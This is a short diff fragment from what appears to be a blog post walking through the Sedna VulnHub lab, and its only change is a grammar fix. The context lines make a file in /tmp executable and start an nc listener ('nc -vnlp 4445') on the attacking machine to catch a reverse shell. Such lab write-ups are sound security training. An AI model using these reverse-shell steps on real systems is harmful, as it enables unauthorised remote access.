wulfgarpro/wulfgar.pro/_posts/2020-09-19-sedna-vulnhub.md

 $ chmod +x /tmp/update
 ```

-Start `nc` listener on the attacking machine, specifying expected reverse shell port (4445 in this case):
+Start `nc` listener on the attacking machine, specifying the expected reverse shell port (4445 in this case):

 ```bash
 $ nc -vnlp 4445